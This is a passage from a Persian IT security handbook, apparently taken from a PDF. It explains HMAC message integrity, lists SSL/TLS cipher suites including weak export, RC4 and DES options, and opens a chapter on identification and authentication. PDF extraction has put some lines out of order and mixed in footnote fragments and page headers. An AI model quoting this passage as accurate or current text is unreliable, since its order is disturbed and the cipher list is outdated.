‫ﺗﺮﻛﻴﺐ ﻣﻲﻛﻨﺪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻃﻼﻋﺎﺕ ﺍﺿﺎﻓﻲ ﻣﺜﻞ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺳﺮﻱ ﭘﺮﻭﺗﻜﻞ ﻧﻴﺰ ﮔﻨﺠﺎﻧﺪﻩ ﻣﻲﺷﻮﺩ ﺗﺎ ﺣﻤﻼﺕ ﻭﺍﻛﻨﺸﻲ ﺭﺍ ﺧﻨﺜـﻲ ﻛﻨـﺪ‪.‬‬
‫ﻓﺮﺳﺘﻨﺪﺓ ﭘﻴﺎﻡ‪ ،HMAC ،‬ﻛﻠﻴﺪ‪ ،‬ﻭ ﻫﺮ ﺍﻃﻼﻋﺎﺕ ﺍﺿﺎﻓﻪ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﺮﺩﻩ ﻭ ‪ HMAC‬ﺭﺍ ﺑﻪ ﻫﻤﺮﺍﻩ ﭘﻴﺎﻡ ﺍﺻﻠﻲ ﺍﻧﺘﻘﺎﻝ ﻣﻲﺩﻫـﺪ‪ .‬ﮔﻴﺮﻧـﺪﻩ ﺑـﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﻴﺎﻡ ﻭ ﻛﭙﻲ ﺧﻮﺩ ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰ‪ HMAC ،‬ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﻣﺤﺎﺳﺒﻪ ﻣﻲﻛﻨﺪ )ﺑﻪ ﻫﻤﺮﺍﻩ ﺍﻃﻼﻋﺎﺕ ﺍﺿـﺎﻓﻪ‪ ،‬ﻣﺜـﻞ ﺷـﻤﺎﺭﺓ ﺳـﺮﻱ ﻣـﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ(‪ ،‬ﻭ‬
‫ﺳﭙﺲ ‪ HMAC‬ﻣﺤﺎﺳﺒﻪ ﺷﺪﻩ ﺭﺍ ﺑﺎ ‪ HMAC‬ﺩﺭﻳﺎﻓﺖ ﺷﺪﻩ ﻣﻘﺎﻳﺴﻪ ﻣﻲﻛﻨﺪ ﺗﺎ ﺑﺒﻴﻨﺪ ﻛﻪ ﺁﻳﺎ ﻣﻄﺎﺑﻘﺖ ﺩﺍﺭﻧﺪ ﻳﺎ ﺧﻴﺮ‪ ،‬ﻭ ﺍﮔﺮ ﻣﻄﺎﺑﻘﺖ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻨﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﭼﻮﻥ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻋﻮﺽ ﻧﺸﺪﻩ‪ ،‬ﮔﻴﺮﻧﺪﻩ ﺧﻮﺍﻫﺪ ﺩﺍﻧﺴﺖ ﻛﻪ ﭘﻴﺎﻡ ﺍﺻﻠﻲ ﺗﻐﻴﻴﺮ ﭘﻴﺪﺍ ﻧﻜﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫‪Au=RSA Enc=3DES(168) Mac=SHA1‬‬
‫‪Au=DSS Enc=3DES(168) Mac=SHA1‬‬
‫‪Au=RSA Enc=3DES(168) Mac=SHA1‬‬
‫‪EDH-RSA-DES-CBC3-SHA SSLv3 Kx=DH‬‬
‫‪EDH-DSS-DES-CBC3-SHA SSLv3 Kx=DH‬‬
‫‪DES-CBC3-SHA‬‬
‫‪SSLv3 Kx=RSA‬‬
‫‪123 W. Curtis Preston‬‬
‫‪124 Unix Backup And Recovery‬‬
‫‪125 Hash Message Authentication Code‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ‪HMAC‬ﻫﺎ ﺑﺮﺍﻱ ﻣﻘﺎﻭﻡ ﻛﺮﺩﻥ ﭘﻴﺎﻣﻬﺎﻱ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺷﺒﻜﻪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧـﺪ‪ ،‬ﭼـﻮﻥ ﺑـﻪ ﻧـﺴﺒﺖ ﺍﻣـﻀﺎﻫﺎﻱ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺴﻴﺎﺭ ﺳﺮﻳﻌﺘﺮ ﻣﺤﺎﺳﺒﻪ ﻣﻲﺷﻮﻧﺪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺯ ﻧﻈﺮ ﺍﻧﺪﺍﺯﻩ ﻛﻮﭼﻜﺘﺮ ﻫﺴﺘﻨﺪ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳﻦ ﻣﻮﺍﺭﺩ‪HMAC ،‬ﻫـﺎ ﺑـﺮ ﺍﺳـﺎﺱ ﻳـﻚ‬
‫ﻻ ﺑﺎ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ‬
‫ﻛﻠﻴﺪ ﻣﺸﺘﺮﮎ ﭘﺎﻳﻪﮔﺬﺍﺭﻱ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺑﺎﻳﺪ ﺍﺯ ﺧﻄﺮ ﻣﺤﺎﻓﻈﺖ ﺷﻮﺩ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﺍﺯ ﺗﺮﻛﻴـﺐ‬
‫ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪ .‬ﭼﻨﺪﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪ ﺳﺎﺧﺘﻪ ﺷﺪﻩﺍﻧـﺪ‪ .‬ﺍﻳـﻦ ﭘﺮﻭﺗﻜﻠﻬـﺎ ﻣﻌﻤـﻮ ﹰ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺳﺎﺧﺘﻪ ﺷﺪﻩﺍﻧﺪ ﺗﺎ ﻣﺒﺎﺩﻟﺔ ﻛﻠﻴﺪ‪ ،‬ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ،‬ﻭ ﺗﺼﺪﻳﻖ ﺻﺤﺖ ﭘﻴﺎﻡ ﺭﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛﻨﻨﺪ‪ ،‬ﺑـﻪ ﺍﺿـﺎﻓﺔ‬
‫ﻣﺸﺨﺼﺎﺕ ﺍﻳﻨﻜﻪ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﭼﮕﻮﻧﻪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ‪ ،‬ﺍﺳﺘﻮﺍﺭﻧﺎﻣﻪﻫﺎﻱ ﺗﺒﺎﺩﻟﻲ ﻭ ﻛﻠﻴﺪﻫﺎﻱ ﺟﻠـﺴﻪ ﺑـﻪ‬
‫ﺗﻮﺍﻓﻖ ﺧﻮﺍﻫﻨﺪ ﺭﺳﻴﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﭘﺮﻭﺗﻜﻞ ‪ SSL/TLS‬ﺍﺯ ﺍﻳﻦ ﺗﺮﻛﻴﺒﺎﺕ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﺪ‪:‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
٣١٢
DHE-DSS-RC4-SHA
SSLv3 Kx=DH Au=DSS Enc=RC4(128) Mac=SHA1
RC4-SHA SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=SHA1
RC4-MD5 SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5
EXP1024-DHE-DSS-RC4-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=RC4(56) Mac=SHA1 export
EXP1024-RC4-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56) Mac=SHA1 export
EXP1024-DHE-DSS-DES-CBC-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=DES(56) Mac=SHA1
export
EXP1024-DES-CBC-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=DES(56) Mac=SHA1 export
EXP1024-RC2-CBC-MD5 SSLv3 Kx=RSA(1024) Au=RSA Enc=RC2(56) Mac=MD5 export
EXP1024-RC4-MD5 SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56) Mac=MD5 export
EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH Au=RSA Enc=DES(56) Mac=SHA1
EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH Au=DSS Enc=DES(56) Mac=SHA1
DES-CBC-SHA SSLv3 Kx=RSA Au=RSA Enc=DES(56) Mac=SHA1
EXP-EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH(512) Au=DSS Enc=DES(40) Mac=SHA1 export
EXP-DES-CBC-SHA SSLv3 Kx=RSA(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-RC2-CBC-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export
EXP-RC4-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export
‫ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬،(‫ ﺑﺎﺷـﺪ‬RSA ‫ ﻳـﺎ‬Diffi-Hellman ‫ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ‬،Kx) ‫ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺟﻬﺖ ﻣﺒﺎﺩﻟﺔ ﻛﻠﻴﺪ‬،‫ﺐ ﺍﻟﮕﻮﺭﻳﺘﻢ‬
‫ﻫﺮ ﺗﺮﻛﻴ ﹺ‬
‫ ﻭ ﻛـﺪﻫﺎﻱ‬،(‫ ﺑﺎ ﻃﻮﻝ ﻛﻠﻴـﺪ ﻣﻌـﻴﻦ ﺑﺎﺷـﺪ‬RC2 ‫ ﻳﺎ‬،RC4 ،‫ ﺳﻪﮔﺎﻧﻪ‬DES ،DES ‫ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ‬،Enc) ‫ ﺭﻣﺰﮔﺬﺍﺭﻱ‬،(‫ ﺑﺎﺷﺪ‬DSS ‫ ﻳﺎ‬RSA ‫ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ‬،Au)
.‫ ﺑﺎﺷﺪ( ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ‬MD5 ‫ ﻳﺎ‬SHA1 ‫ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ‬،Mac) ‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﭘﻴﺎﻡ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٣١٣‬‬
‫ﻓﺼﻞ ﭘﻨﺠﻢ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺍﺭﺗﺒﺎﻁ ﺩﺍﺩﻥ ﻳﻚ ﻫﻮﻳﺖ ﺑﺎ ﻳﻚ ﻣﻮﺿﻮﻉ ﺍﺳﺖ‪ .‬ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﺍﻋﺘﺒﺎﺭ ﻳﻚ ﻫﻮﻳﺖ ﺭﺍ ﺑﻪ ﺍﺛﺒﺎﺕ ﻣـﻲﺭﺳـﺎﻧﺪ؛ ﻭ ﺗـﺼﺪﻳﻖ ﺍﺧﺘﻴـﺎﺭ‪،‬‬
‫ﺍﺭﺗﺒﺎﻁ ﺩﺍﺩﻥ ﺣﻘﻮﻕ ﻳﺎ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺑﺎ ﻳﻚ ﻫﻮﻳﺖ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻓﺼﻞ ﺭﻭﻱ ﺩﻭ ﻣﻔﻬﻮﻡ ﺑﺎﻻ ﺗﺄﻛﻴﺪ ﺩﺍﺭﺩ‪ .‬ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﻪ ﻓﺮﺩ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﺍﻧﺠﺎﻡ ﺷﻮﺩ‪ ،‬ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﺷـﺒﻜﻪ‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻫﻮﻳﺘﻬﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﺮﻛﺰﻱ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩ ﻭ ﺗﻮﺳـﻂ ﮔﺮﻭﻫﻬـﺎﻱ‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻓﻨﻮﻥ ﺷﻨﺎﺳﺎﻳﻲ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻣﺨﺘﻠﻔﻲ ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ‪ .‬ﺳﺎﺩﻩﺗﺮﻳﻦ ﺁﻧﻬﺎ ﺑﺮ ﺍﺳﺎﺱ ﺍﺳﺎﻣﻲ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭ ﻣﻲﻛﻨﻨـﺪ‪ ،‬ﻭ ﺑﻘﻴـﻪ‬
‫ﺑﺮ ﺍﺳﺎﺱ ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺸﺨﺼﺎﺕ ﻣﻤﻴﺰﺓ ﺍﻧﺴﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﺑﺴﻨﺠﻨﺪ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‬
‫ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻫﻴﭽﻴﻚ ﺍﺯ ﺗﻜﻨﻴﻜﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻳﻨﮕﻮﻧﻪ ﻧﻴﺴﺘﻨﺪ ﻛﻪ ﻫﺮﮔﺰ ﻧﺘﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺍﺷﺘﺒﺎﻩ ﺍﻧﺪﺍﺧﺖ ﻭ ﺍﺯ ﺳﺪﺷﺎﻥ ﻋﺒﻮﺭ ﻛـﺮﺩ؛ ﻭ ﺍﻟﺒﺘـﻪ ﺧﻮﺷـﺒﺨﺘﺎﻧﻪ‬
‫ﺍﻛﺜﺮ ﺁﻧﻬﺎ ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﻧﺪ ﻛﻪ ﺍﻳﻨﮕﻮﻧﻪ ﺑﺎﺷﻨﺪ‪ .‬ﻫﺪﻑ ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻏﻴﺮﻣﻤﻜﻦ ﻛﺮﺩﻥ ﺟﻌﻞ ﻫﻮﻳﺖ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜﻪ ﻛﺎﻫﺶ ﻣﺨـﺎﻃﺮﺓ‬
‫ﺟﻌﻞ ﻫﻮﻳﺖ ﻭ ﻣﻴﺰﺍﻥ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺑﻪ ﻳﻚ ﺳﻄﺢ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﺍﺳﺖ‪ .‬ﻳﻚ ﻫﺪﻑ ﻣﻬﻢ ﺩﻳﮕﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺗﻌﻴﻴﻦ ﻛﻤـﻲ ﻣﻘـﺪﺍﺭ‬
‫ﻣﺨﺎﻃﺮﻩﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﺍﺳﺘﻘﺮﺍﺭ ﺳﻴﺴﺘﻢ ﻫﻨﻮﺯ ﺑﺎﻗﻲ ﻣﺎﻧﺪﻩ ﺍﺳﺖ؛ ﭼﺮﺍﮐﻪ ﺗﻌﻴﻴﻦ ﻛﻤﻲ ﻣﻘﺪﺍﺭ ﻣﺨﺎﻃﺮﺓ ﺑﺎﻗﻴﻤﺎﻧـﺪﻩ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﻛـﻪ‬
‫ﺳﺎﺯﻣﺎﻥ ﺑﺘﻮﺍﻧﺪ ﺩﺭﺑﺎﺭﺓ ﺳﻴﺎﺳﺘﻬﺎ‪ ،‬ﻧﻴﺎﺯ ﻳﺎ ﺗﻤﺎﻳﻞ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺟﺎﻳﮕﺰﻳﻦ‪ ،‬ﻭ ﺣﺘﻲ ﻣﻴﺰﺍﻥ ﭘﻮﺷـﺶ ﻻﺯﻡ ﺑﻴﻤـﻪ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺩﺭ‬
‫ﻣﻘﺎﺑﻞ ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺗﺼﻤﻴﻢ ﺑﮕﻴﺮﺩ‪.‬‬
‫ﺑﻪ ﻳﻚ ﻓﺮﻭﺩﮔﺎﻩ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﭘﺮﻭﺍﺯ ﻛﻨﻴﺪ ﻭ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺍﻋﺘﺒﺎﺭﻱ ﻳﻚ ﺁﮊﺍﻧﺲ ﻛﺮﺍﻳﺔ ﻣﺎﺷﻴﻦ ﺑﻜﺸﻴﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﻣﻲﺗﻮﺍﻧﻴﺪ‬
‫ﺑﺎ ﻳﻚ ﻣﺎﺷﻴﻦ ﻛﻪ ﺷﺎﻳﺪ ﺑﻴﺶ ﺍﺯ ﺑﻴﺴﺖ ﻫﺰﺍﺭ ﺩﻻﺭ ﺍﺭﺯﺵ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺗﺎ ﻣﻘﺼﺪ ﺧﻮﺩ ﺭﺍﻧﻨﺪﮔﻲ ﻛﻨﻴـﺪ‪ .‬ﺗﻨﻬـﺎ ﺗـﻀﻤﻴﻨﻲ ﻛـﻪ ﺁﮊﺍﻧـﺲ ﻛﺮﺍﻳـﻪ‬
‫ﻣﺎﺷﻴﻦ ﺍﺯ ﺷﻤﺎ ﺩﺍﺭﺩ ﻛﻪ ﺍﺗﻮﻣﺒﻴﻞ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ ﺗﻌﻬﺪ ﺷﻤﺎﺳﺖ ‪ -‬ﻭ ﺍﻃﻼﻉ ﺍﺯ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻛﻪ ﺍﮔﺮ ﺧﻠﻒ ﻭﻋﺪﻩ ﻛﻨﻴـﺪ‪ ،‬ﺁﻧﻬـﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﻻ ﺑﻪ ﺯﻧﺪﺍﻥ ﺧﻮﺍﻫﻴﺪ ﺍﻓﺘﺎﺩ‪.‬‬
‫ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺷﻤﺎ ﺭﺍ ﺑﺎﻃﻞ ﻛﻨﻨﺪ ﻭ ﺷﻤﺎ ﺍﺣﺘﻤﺎ ﹰ‬
‫ﺍﮔﺮ ﺁﮊﺍﻧﺲ ﻛﺮﺍﻳﻪ ﺷﻤﺎ ﺭﺍ ﻧﻤﻲﺷﻨﺎﺧﺖ‪ ،‬ﺗﻌﻬﺪ ﺷﻤﺎ ﺑﺮﺍﻱ ﺁﻥ ﻣﻔﻬﻮﻡ ﺧﺎﺻﻲ ﻧﺪﺍﺷﺖ‪ .‬ﺍﻳﻦ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ﺭﺍﻧﻨﺪﮔﻲ‪ ،‬ﮔﺬﺭﻧﺎﻣﻪ ﻭ ﻳﺎ ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ‬
‫ﺷﻤﺎ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻛﻨﺎﺭ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﺁﮊﺍﻧﺲ ﻛﺮﺍﻳﻪ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﺩﺭ ﻋﺮﺽ ﭼﻨﺪ ﺛﺎﻧﻴﻪ ﺑﻔﻬﻤﺪ ﻛﻪ ﺁﻳـﺎ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺷـﻤﺎ‬
‫ﺩﺯﺩﻱ ﺍﺳﺖ ﻳﺎ ﺧﻴﺮ‪ ،‬ﻭ ﻣﺤﻞ ﻛﺎﺭﺗﺎﻥ ﻭ ﺷﺮﻛﺖ ﺑﻴﻤﺔ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻧﺮﺍ ﺍﺯ ﺍﻋﺘﻤﺎﺩﻱ ﮐﻪ ﺑﻪ ﺷﻤﺎ ﮐﺮﺩﻩ ﺁﮔﺎﻩ ﻛﻨﺪ‪.‬‬
‫ﺩﺭ ﻃﺮﺍﺣﻲ ﻣﺪﺍﺭﻙ ﺷﻨﺎﺳﺎﻳﻲ ﭼﺎﭘﻲ‪ ،‬ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺭﺯﻳﺎﺑﻲ ﻓﻴﺰﻳﻜﻲ ﺁﻧﻬﺎ ﻣﻼﻙ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ‪ .‬ﻳﻚ ﮔﺬﺭﻧﺎﻣﻪ ﺑﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ ﻳـﻚ ﻣـﺪﺭﻙ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺧﻮﺏ ﺍﺳﺖ ﻛﻪ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺑﻄﻮﺭ ﻓﻴﺰﻳﻜﻲ ﻗﺎﺑﻞ ﺍﺭﺯﻳﺎﺑﻲ ﻫﺴﺘﻨﺪ )ﺟﻨﺲ‪ ،‬ﻗﺪ‪ ،‬ﻭﺯﻥ‪ ،‬ﻋﻜﺲ‪ ،‬ﺍﻣـﻀﺎ(‪ ،‬ﺟﻌـﻞ ﺁﻥ ﻣـﺸﻜﻞ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻓﻴﺰﻳﻜﻲ‬
‫‪٣١٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﺳﺖ‪ ،‬ﺑﺮﺍﺣﺘﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪ ،‬ﻭ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻣﺮﻛﺰ ﻣﻌﺘﺒﺮ‪ ،‬ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ‪ ،‬ﻭ ﻣﺸﻬﻮﺭ ﺻﺎﺩﺭ ﻣـﻲﺷـﻮﺩ ﻛـﻪ ﻗﺒـﻞ ﺍﺯ‬
‫ﺻﺪﻭ ﹺﺭ ﻣﺪﺭﻙ‪ ،‬ﻫﻮﻳﺖ ﻓﺮﺩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﻋﻜﺲ‪ ،‬ﻛﺎﺭﺕ ﻋﻀﻮﻳﺖ ﺩﺭ ﻳﻚ ﺑﺎﺷﮕﺎﻩ ﺭﻭﺯﻧﺎﻣﻪﻧﮕـﺎﺭﻱ ﻭﺍﺟـﺪ ﻫﻴﭽﻴـﻚ ﺍﺯ ﺍﻳـﻦ ﺻـﻔﺎﺕ‬
‫ﻧﻴﺴﺖ‪.‬‬
‫ﻓﻨﻮﻥ ﺷﻨﺎﺳﺎﻳﻲ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ‬
‫ﺑﺮﺍﻱ ﺑﻴﺶ ﺍﺯ ﭘﻨﺠﺎﻩ ﺳﺎﻝ ﺍﺳﺖ ﻛﻪ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺨﺸﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑـﺴﻴﺎﺭ ﺑـﺰﺭﮒ ﻫـﺴﺘﻨﺪ‪ .‬ﺣﺘـﻲ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻫﻢ ﻛﻪ ﺩﺭ ﺩﻭ ﺩﻫﺔ ﺍﻭﻝ ﻭﺟﻮﺩ ﺧﻮﺩ ﻓﺎﻗﺪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻮﺩﻩﺍﻧﺪ‪ ،‬ﺍﻛﻨﻮﻥ ﺑﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻣﺠﻬﺰ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‪ ،‬ﺩﺳﺘﺮﺳﻴﻬﺎ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻨﺪ‪ .‬ﻳﻚ ﺗﻔﺎﻭﺕ ﻛﻠﻴﺪﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬
